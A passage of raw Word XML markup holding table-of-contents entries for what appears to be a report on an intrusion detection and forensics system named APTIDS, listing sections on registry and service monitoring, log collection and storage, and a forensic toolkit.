            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.6</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External Knowledge</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239582 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="001D1C85" w:rsidRDefault="00856098">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485239583" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 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PROJECT ARCHITECTURE</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239583 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</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84" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1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APTIDS’s overall architecture</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239584 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</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85" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2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Registry Monitor Module</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239585 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</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86" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1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Registry Monitor Architecture</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239586 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</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87" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2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Registry Monitor Workflow</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239587 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</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88" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3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Identifying Registry Change</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239588 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</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89" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3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Service Monitor Module</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239589 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</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90" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1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Service Monitor Architecture</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239590 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</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91" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2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Service Monitor Workflows</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239591 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</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92" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.3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NotifyServiceStatusChange and Asynchronous Procedure Calls</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239592 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</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93" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4</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Distributed Log Collector Hardware (2/6)</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239593 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</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94" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1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Log Collector Hardware architecture</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239594 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</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95" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.2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Distributed Log Collector Hardware workflows</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239595 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</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96" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.3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DLCH Server</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239596 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</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597" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5</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Centralized Log Storage System</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239597 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</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98" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.1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CLSS Architecture</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239598 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</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599" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.2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CLSS Workflows</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239599 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</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600" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6</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Sentry: Forensic Toolkit</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239600 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</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601" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.1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Powershell for penetration testing</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239601 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</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602" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.2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Sentry’s Modules</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239602 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="001D1C85" w:rsidRDefault="00856098">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485239603" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 4.</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IMPLEMENTATION</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239603 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
